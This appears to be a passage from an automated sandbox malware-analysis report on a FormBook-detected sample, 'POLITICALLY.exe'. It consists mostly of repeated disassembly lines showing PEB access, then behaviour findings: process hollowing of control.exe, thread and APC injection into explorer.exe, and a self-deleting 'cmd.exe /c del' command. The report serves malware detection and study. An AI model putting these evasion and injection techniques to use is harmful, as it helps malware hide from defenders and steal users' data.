        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23B171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25B944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25B944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2661A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2661A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F49A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F49A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F49A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F49A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B69A6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B51BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B51BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B51BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B51BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26A185 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25C182 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262990 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2C41E8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483849B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F8CD6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E14FB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485BC2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485A44B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BC450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BC450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484746D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04852581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04852581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04852581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04852581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485FD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485FD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F05AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F05AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048535A1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04851DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04851DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04851DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6DC9 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483D5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483D5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048EFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048EFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048EFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048EFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048D8DF1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482AD30 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048EE539 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F8D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048AA537 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04854D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04854D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04854D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04863D43 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A3540 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04847D50 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484C577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484C577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BFE87 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A46A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04868EC7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048536CC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048DFEC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F8ED6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048376E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048516E0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04858E00 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485A61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485A61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482E620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048DFE3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048EAE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048EAE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483766D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04838794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A7794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A7794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A7794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048637F5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485A70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485A70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484F716 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BFF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BFF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04824F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04824F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485E730 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483EF40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483FF60 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F8F6A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04829080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A3884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A3884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048690AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485F0BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BB8D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048258EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F4015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F4015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A7016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A7016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A7016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04840050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04840050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F1074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E2073 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485A185 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484C182 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04852990 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048561A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048561A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A69A6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A51BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A51BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A51BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A51BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048B41E8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04829100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04829100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04829100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04844120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04844120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04844120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04844120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04844120 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484B944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484B944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482C962 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482B171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482B171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\POLITICALLY.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\POLITICALLY.exe | Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
Source: C:\Users\user\Desktop\POLITICALLY.exe | Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\POLITICALLY.exe | Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\control.exe | Thread register set: target process: 3440
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\POLITICALLY.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\POLITICALLY.exe | Section unmapped: C:\Windows\SysWOW64\control.exe base address: 330000
Source: C:\Users\user\Desktop\POLITICALLY.exe | Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'
Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\POLITICALLY.exe'
Source: explorer.exe, 00000013.00000000.521733147.0000000004F80000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000013.00000002.591577775.00000000008B8000.00000004.00000020.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000013.00000002.593225214.0000000000EE0000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
Source: explorer.exe, 00000013.00000002.593225214.0000000000EE0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\POLITICALLY.exe | Code function: 2_2_0221DC36 cpuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
Yara detected Generic Dropper
Source: Yara match | File source: Process Memory Space: POLITICALLY.exe PID: 6976, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 5548, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY

